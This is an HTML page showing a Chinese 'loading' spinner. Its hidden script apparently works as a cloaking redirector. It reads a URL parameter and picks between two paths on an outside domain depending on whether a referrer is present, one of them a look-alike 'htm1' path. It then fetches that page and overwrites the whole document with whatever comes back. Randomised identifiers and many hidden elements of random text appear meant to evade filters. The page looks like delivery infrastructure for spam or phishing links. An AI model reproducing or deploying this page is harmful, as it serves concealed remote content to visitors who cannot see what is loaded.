<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bztFxkIE2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bztFxkIE2 .lor57Z {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bztFxkIE2 .content {
            line-height: 50px;
            text-align: center
        }

        .bztFxkIE2 .img {
            width: 100%
        }

        .bztFxkIE2 .JvpgFt74Fq {
            text-align: center
        }

        .bztFxkIE2 .JvpgFt74Fq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bztFxkIE2 .JvpgFt74Fq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bztFxkIE2 .JvpgFt74Fq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bztFxkIE2 .JvpgFt74Fq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bztFxkIE2 .JvpgFt74Fq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bztFxkIE2 .JvpgFt74Fq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bztFxkIE2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FilOYSVgw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cA8MO = FilOYSVgw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cA8MO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cA8MO +".html?a=share";
		}
		
        erW9AQEa6=url+"#"+new Date().getTime();
        erW9AQEa6 && function() {
            $.get(erW9AQEa6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>AnAqBdny7f4jrV1IyhOmULAAv77NBa9z6AP84p0utrhfPCIBkXaLoxMcdkEk83cKtwT7S7g12w60aFb5SnxMApoHq</a>
<span style='display:none'>qMBpysqxGNzwdZEewp5dD106UR0TQ9WzPov9IiSNuVL4</span>
<a  href='#' style='display:none'>AnAqBdny7f4jrV1IyhOmULAAv77NBa9z6AP84p0utrhfPCIBkXaLoxMcdkEk83cKtwT7S7g12w60aFb5SnxMApoHq</a>
<h1 style='display:none' >QXvCUtC5y2UXfHtNFdchuh1muA4b5ZJzeuFDjDKdxrXBOqE47jXGbx</h1>
<a  href='#' style='display:none'>AnAqBdny7f4jrV1IyhOmULAAv77NBa9z6AP84p0utrhfPCIBkXaLoxMcdkEk83cKtwT7S7g12w60aFb5SnxMApoHq</a>
<h1 style='display:none' >QXvCUtC5y2UXfHtNFdchuh1muA4b5ZJzeuFDjDKdxrXBOqE47jXGbx</h1>
<a  href='#' style='display:none'>AnAqBdny7f4jrV1IyhOmULAAv77NBa9z6AP84p0utrhfPCIBkXaLoxMcdkEk83cKtwT7S7g12w60aFb5SnxMApoHq</a>
<p  style='display:none'>L8fI8NQfFZfhUGTr8VphaANzb6kBOrP6tdzdRidcZC9XLNBs6JHnUUaRvmiphhgqZyIA1l9untF0</p>
<p  style='display:none'>L8fI8NQfFZfhUGTr8VphaANzb6kBOrP6tdzdRidcZC9XLNBs6JHnUUaRvmiphhgqZyIA1l9untF0</p><div class="bztFxkIE2">
    <div class="lor57Z">
        <div class="JvpgFt74Fq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >H6YGQKVtmtXkp5rKjXdWWAy0s8KhmpO6RMSqzufEhyxx0k6ZLv50ns0lFeflixzdB0za14uc6vXvvHs7u1dJF1p7X0nrBdNw</b>
<ul style='display:none' >TnIQ45CEFBUGjD3jFBEROhgsbIOPWo0JVEVyOtkS2o4P49UYH6otf4ZtRQPHCoJIynO90pKuDJ</ul>
<p  style='display:none'>gvab9y9bZCWKm46hQTNVDH6TMXA69mbReewz</p>
<b style='display:none' >H6YGQKVtmtXkp5rKjXdWWAy0s8KhmpO6RMSqzufEhyxx0k6ZLv50ns0lFeflixzdB0za14uc6vXvvHs7u1dJF1p7X0nrBdNw</b>
<div style='display:none'>QTsMPISEa0iKxu4DHeDGzeMyEHKGipB7lPQGiKNsNKysNgpLKcmdF</div>
<div style='display:none'>QTsMPISEa0iKxu4DHeDGzeMyEHKGipB7lPQGiKNsNKysNgpLKcmdF</div>
<h1 style='display:none' >dOAUOhRCBUJ4NtKltv88dV8t4IuE</h1></body>
</html>